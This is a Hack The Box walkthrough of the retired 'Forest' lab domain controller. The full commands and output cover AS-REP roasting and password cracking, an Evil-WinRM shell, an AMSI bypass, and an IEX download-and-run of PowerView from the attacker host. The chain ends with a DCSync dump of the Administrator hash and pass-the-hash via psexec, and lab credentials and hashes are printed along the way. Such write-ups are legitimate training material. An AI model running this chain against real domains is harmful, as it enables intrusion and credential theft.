HTB Walkthrough: Forest w/o Metasploit (retired)
Forest is a retired box on HTB and is part of TJ Null’s OCSP-like boxes.
Hostname: Forest| Difficulty Level: Easy | Operating System: Windows
NMAP Scan
┌──(root💀kali)-[/home/kali/labs/HTB/Forest]
└─# nmap -sC -sV -oA Forest 10.10.10.161
Starting Nmap 7.91 ( https://nmap.org ) at 2021–05–13 20:35 EDT
Nmap scan report for 10.10.10.161
Host is up (0.021s latency).
Not shown: 989 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021–05–14 00:58:12Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h41m59s, deviation: 4h02m30s, median: 21m58s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2021–05–13T17:58:16–07:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021–05–14T00:58:15
|_ start_date: 2021–05–14T00:55:47
Since, LDAP is running on port 389 and 3268, let us enumerate for users.
Enumeration
┌──(root💀kali)-[/home/kali/labs/HTB/Forest]
└─# ldapsearch -h 10.10.10.161 -x -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
##
dn:
namingContexts: DC=htb,DC=local
namingContexts: CN=Configuration,DC=htb,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=htb,DC=local
namingContexts: DC=DomainDnsZones,DC=htb,DC=local
namingContexts: DC=ForestDnsZones,DC=htb,DC=local
Getting the user name from ldapsearch.
┌──(root💀kali)-[/home/kali/labs/HTB/Forest]
└─# ldapsearch -h 10.10.10.161 -x -b “DC=htb,DC=local” ‘(objectClass=Person)’ sAMAccountName | grep sAMAccountName | awk ‘{print $2}’ > userlist.txt
Exploitation
┌──(root💀kali)-[/home/kali/labs/HTB/Forest]
└─# /home/kali/impacket/build/scripts-3.8/GetNPUsers.py -dc-ip 10.10.10.161 -request ‘htb.local/’ -format hashcatImpacket v0.9.22 — Copyright 2020 SecureAuth Corporation
Name MemberOf PasswordLastSet LastLogon UAC
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —
svc-alfresco CN=Service Accounts,OU=Security Groups,DC=htb,DC=local 2021–05–14 15:58:23.745672 2021–05–14 15:59:48.136463 0x410200$krb5asrep$23$svc-alfresco@HTB.LOCAL:5b0f002a13e822cd088b0b9c3e707c71$57105e637ea29ceafac961dd781f17b36f23a72a89945cf9e7b3a089addb6b92a7aa930afe7cccf93d89438127bb86463b9fecff2a1f03500c3e1bf9b00594baab2daf011f14b25fc493191e215448c35d7cded410707a9dee2667b1b7da1575d8f3ab4b7a8c1c5ec5743ee3f0ad3c8fa729877ec214cb8780cfa71f8a097580b4f6ad0e5203efc2cd5a7dea7cda6e0755dd042561979941862bda3ad471d5262d8705bf570fc87f3d6326c49760a33e847ebdd58ce019b1551fc724b2c597b439badaca115f8106b3e6967774c7003d936ee35f31fd9f31b5b6a3accce3866e203ccafc62a7
Trying kerberoasting to crack the password.
┌──(root💀kali)-[/home/kali/labs/HTB/Forest]
└─# john hash.txt — wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x])
Will run 4 OpenMP threads
Press ‘q’ or Ctrl-C to abort, almost any other key for status
s3rvice ($krb5asrep$23$svc-alfresco@HTB.LOCAL)
1g 0:00:00:14 DONE (2021–05–15 12:37) 0.07122g/s 291008p/s 291008c/s 291008C/s s401447401447401447..s3r2s1
Use the “ — show” option to display all of the cracked passwords reliably
Session completed
OR
Crack the hash using:
kali@kali:~/OSCP/HTB/Forest$ hashcat — force -m 18200 svchash.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/InsidePro-PasswordsPro.rule
and password is: s3rvice for user: svc-alfresco
Get reverse access and find the user.txt:
kali@kali:/opt/evil-win rm$ ruby evil-winrm.rb -u svc-alfresco -p s3rvice -i 10.10.10.161
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
- Evil-WinRM* PS C:\Users\svc-alfresco\Documents>
Privilege Escalation
Let us use bloodhound to enumerate active directory. Transfer ‘SharpHound.exe’ (Present in BloodHound directory) to target machine and run it. Note: (git clone the bloodhound project for SharpHound.exe).
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> ./SharpHound.exe
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> dir
Directory: C:\Users\svc-alfresco\Desktop
Use below link for bloodhound configuration:
https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-with-bloodhound-on-kali-linux
Once bloodhound configuration is complete, let us enumerate victim domain. Transfer the above generated zip file to kali machine. Upload the zip file to bloodhound portal.
Data visualization using bloodhound. Search for the account ‘svc-alfresco’ and right click it > Mark user as owned.
Click on ‘Find Shortest Paths to Domain Admins’
Svc-Alfresco is part of ‘Service Accounts’ groups which is a part of ‘Privileged IT Accounts’ group. This group is part of ‘Account Operators’ group. With ‘Account Operators’ group, Svc-Alfresco can create users. Further, Account Operators group has ‘GenericAll’ permissions on ‘Exchange Windows Permissions’ group. This group has ‘WriteDacl’ permissions on the domain.
Since ‘Account Operators’ has ‘GenericAll’ permissions on ‘Exchange Windows Permissions’ group, it means ‘Svc-Alfresco’ can modify ‘Exchange Windows Permissions’ group. With ‘WriteDacl’ we can modify domain’s access control list/entries so that you can perform DCSync on the domain.
Let us implement these steps.
a) Creating new user:
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> net user sarah OSCP2021 /add /domain
The command completed successfully.
b) Adding ‘sarah’ in ‘Exchange Windows Permissions’:
Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> net group “Exchange Windows Permissions” /add sarah
The command completed successfully.
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> net localgroup “Remote Management Users” sarah /add
The command completed successfully.
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> menu
,. ( . ) “ ,. ( . ) .
(“ ( ) )’ ,’ (` ‘` (“ ) )’ ,’ . ,)
.; ) ‘ (( (“ ) ;(, . ;) “ )” .; ) ‘ (( (“ ) );(, )((
_”.,_,.__).,) (.._( ._), ) , (._..( ‘.._”._, . ‘._)_(..,_(_”.) _( _’)
\_ _____/__ _|__| | (( ( / \ / \__| ____\______ \ / \
| __)_\ \/ / | | ;_)_’) \ \/\/ / |/ \| _/ / \ / \
| \\ /| | |__ /_____/ \ /| | | \ | \/ Y \
/_______ / \_/ |__|____/ \__/\ / |__|___| /____|_ /\____|__ /
\/ \/ \/ \/ \/
By: CyberVaca, OscarAkaElvis, Laox @Hackplayers
[+] Bypass-4MSI
[+] Dll-Loader
[+] Donut-Loader
[+] Invoke-Binary
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> Bypass-4MSI
[+] Patched! :D
c) Give DCSync permissions:
For help with DCSync, right-click ‘WriteDacl’ in the graph and select ‘help’
Getting PowerView from github in kali.
┌──(root💀kali)-[/home/kali/labs/HTB/Forest]
└─# wget https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
Transferring the file to target.
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> IEX(New-Object Net.WebClient).downloadString(‘http://<Kali IP>:8000/PowerView.ps1')
Performing the steps mentioned in ‘Abuse Info’
i) $pass= convertto-securestring ‘OSCP2021’ -asplain -force
ii) $cred = new-object system.management.automation.pscredential(‘htb\sarah’, $pass)
iii) Add-ObjectAcl -PrincipalIdentity sarah -Credential $cred -TargetIdentity “DC=htb,DC=local” -Rights DCSync
d) Abusing DCSync to get hashes
┌──(root💀kali)-[~]
└─# python3 /home/kali/labs/HTB/opt/impacket-0.9.22/examples/secretsdump.py htb/sarah@10.10.10.161
Impacket v0.9.22 — Copyright 2020 SecureAuth Corporation
Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 — rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
[*] Cleaning up…
┌──(root💀kali)-[~]
└─# python3 /home/kali/labs/HTB/opt/impacket-0.9.22/examples/psexec.py administrator@10.10.10.161 -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6
And you will get root shell+flag
